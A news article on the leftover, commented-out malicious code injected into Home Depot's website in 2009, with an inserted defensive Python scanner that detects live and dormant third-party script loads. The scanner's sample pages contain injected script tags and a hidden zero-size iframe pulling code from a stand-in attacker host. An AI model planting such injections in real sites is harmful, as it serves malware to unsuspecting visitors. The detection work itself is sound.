The website for do-it-yourself giant Home Depot has been … well, screwed.
An IT analyst has uncovered the lingering remnants of a 2009 breach of security on the major retailer’s website: injected code, hidden in the site’s pages, that redirected a visitor’s browser to a site that served up malware.
“Somebody managed to deface the site and inject that code, so that anyone visiting the site would have loaded the malicious code from this other site,” explained Mike Menefee, founder of security website Infosec Island, which discovered the hack.
He stressed that HomeDepot.com isn’t presently a threat, nor has it been for quite a while. Experts told FoxNews.com that the hack was discovered by someone and disabled — and that’s the mysterious part of the whole thing. Who leaves malicious code lying in wait — dormant, disabled and inactive on their site?
“It looks like the Home Depot site was hacked at some point but is currently not a threat to visitors,” said Chet Wisniewski, senior security advisor with security firm Sophos Labs. But Wisniewski couldn’t explain why the malicious code remained on the retail giant’s website, made inactive only by being commented out — a fact security analysts found simply bizarre.
“Looks like laziness to me,” he told FoxNews.com. “If a web developer stumbled onto this by accident and thought it looked funny, he may have ‘commented it out’ to be sure he could undo it right away if it was supposed to be there.”
Or perhaps the hackers themselves could have disabled the code, perhaps intending to turn it on again at a later date?
“I think it’s unlikely an attacker would intentionally leave behind evidence that he was there commented out … But anything is possible,” Wisniewski said.
While stressing that the site had not been hacked — Home Depot prefers to call the 2009 incident a “breach of security” — spokesman Steve Holmes told FoxNews.com the code was intentionally disabled but left up on the site “for management and analysis.”
“That’s a fairly standard way of making the code inoperable,” he said, noting that it was done in 2009.
“It has now been removed,” Holmes said.
A reader named Scott Frost logged in to note the same thing, pointing out that the malicious code “was commented out and therefore not an issue.” And Frost makes a very good point, Menefee said.
“His defense was, it wasn’t actively running code. He’s right. But leaving it there makes them look pretty careless,” Menefee said, calling the technique of commenting out code “bad practice.” And beyond being poor form, the commented-out code was still served in the page source to every visitor, and its presence actually set off the antivirus alarms on Mark Baldwin’s PC, alerting him to its existence.
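As an added illustration of why a commented-out injection keeps tripping client-side alarms (example code written for this page, not code from the article, Home Depot or Infosec Island): a small Python scanner that reads served HTML and reports every script or iframe pulling content from a third-party host, marking it “dormant” when it sits inside an HTML comment and “live” when the browser would actually fetch it. It assumes the remnant was neutralised by wrapping it in an HTML comment, and the sample pages are constructed here, with the reserved name malware.invalid standing in for the attacker’s host and www.example.com for the site being checked.

```python
"""Scan served HTML for third-party <script>/<iframe> loads and say whether each
is dormant (inside an HTML comment) or live (the browser will fetch it)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Applied only to comment bodies, which the parser hands over as raw text.
TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


class InjectScanner(HTMLParser):
    """Collects (state, tag, src) for every external script/iframe seen."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def _is_external(self, src):
        # Absolute and protocol-relative URLs carry a hostname; same-origin paths do not.
        host = urlparse(src).hostname
        return bool(host) and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        # Anything that reaches here is live markup: the browser will load it.
        if tag in ("script", "iframe"):
            src = dict(attrs).get("src")
            if src and self._is_external(src):
                self.findings.append(("live", tag, src))

    def handle_comment(self, data):
        # Commented-out markup is not executed, but it is still in the bytes
        # every visitor downloads, which is exactly what a client-side AV scans.
        for m in TAG_RE.finditer(data):
            s = SRC_RE.search(m.group(2))
            if s and self._is_external(s.group(1)):
                self.findings.append(("dormant", m.group(1).lower(), s.group(1)))


def scan(html, site_host):
    """Return [(state, tag, src), ...] in document order."""
    parser = InjectScanner(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


SITE = "www.example.com"  # hypothetical site under review

# Constructed sample pages. malware.invalid is a reserved, non-resolving name.
CLEAN = '<html><body><script src="/js/app.js"></script></body></html>'

# What "commenting it out" is meant to achieve: the payload stays in the page
# source but nothing runs.
COMMENTED_OUT = """<html><body>
<!-- <script src="http://malware.invalid/x.js"></script> -->
</body></html>"""

# The failure mode: the injected blob itself contains "-->" (an old-style
# "//-->" inline-script closer). That ends the developer's comment early, so
# everything after it is served live again.
BROKEN_OUT = """<html><body>
<!-- <script type="text/javascript"><!--
document.write('<iframe src="http://malware.invalid/f.html" width=0 height=0></iframe>');
//--></script><script src="http://malware.invalid/x.js"></script> -->
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("commented_out", COMMENTED_OUT),
                       ("broken_out", BROKEN_OUT)):
        for state, tag, src in scan(page, SITE):
            print(f"{name}: {state} <{tag}> -> {src}")
```

Two things follow from running it. Wrapping the injection in a comment leaves it in every response, so any scanner looking at the page bytes keeps flagging the site; and if the injected code happens to contain `-->`, the comment closes early and part of the payload is live once more. The safe way to keep the artifact “for management and analysis” is a ticket or a forensic copy of the page, not the production template.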
Baldwin, who initially discovered the code and blogged about it for Infosec Island, stressed that the Home Depot site was not a threat to do-it-yourselfers at present, but agreed: The continued existence of the malicious code was weird.
“Does it mean that they lost any customer data? No, not at all,” he told FoxNews.com. But someone definitely hacked the site, probably in 2009, when a rash of such attacks hit tens of thousands of sites, he said.
“At some point, that code had to be put in there — and it certainly wasn’t put in by them,” Baldwin said.
“It’s certainly not something I would expect in an organization like this,” Menefee agreed. “It’s pretty sloppy.”